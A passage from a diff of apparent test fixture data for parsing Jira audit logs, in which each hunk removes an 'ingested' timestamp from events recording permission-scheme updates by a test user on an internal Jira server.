Workflow\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1741,7 +1717,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924725021Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.231Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete All Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1815,7 +1790,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924725886Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.229Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Own Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1884,7 +1858,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924726804Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.227Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit All Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1958,7 +1931,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924727678Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.225Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Own Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2027,7 +1999,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924728604Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.223Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Own Attachments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2096,7 +2067,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924729524Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.221Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete All Attachments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2170,7 +2140,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924730390Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.219Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Own Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2239,7 +2208,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924731259Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.217Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete All Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2313,7 +2281,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924732141Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.215Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Own Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2382,7 +2349,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924733089Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.212Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit All Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2456,7 +2422,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924734069Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.210Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Watchers\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2530,7 +2495,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924734945Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.208Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"View Voters and Watchers\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2599,7 +2563,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924735814Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.204Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Modify Reporter\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2673,7 +2636,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924736734Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.190Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Schedule Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2742,7 +2704,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924737609Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.187Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Move Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2811,7 +2772,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924738836Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.184Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Administer Projects\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2885,7 +2845,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924739715Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.182Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Link Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2954,7 +2913,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924740593Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.180Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Work On Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3023,7 +2981,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924741461Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.178Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Attachments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3092,7 +3049,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924742334Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.176Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Close Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3161,7 +3117,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924743266Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.174Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Assignable User\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3230,7 +3185,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924744136Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.173Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3304,7 +3258,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924745010Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.171Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Add Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3373,7 +3326,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924745874Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.168Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Resolve Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application 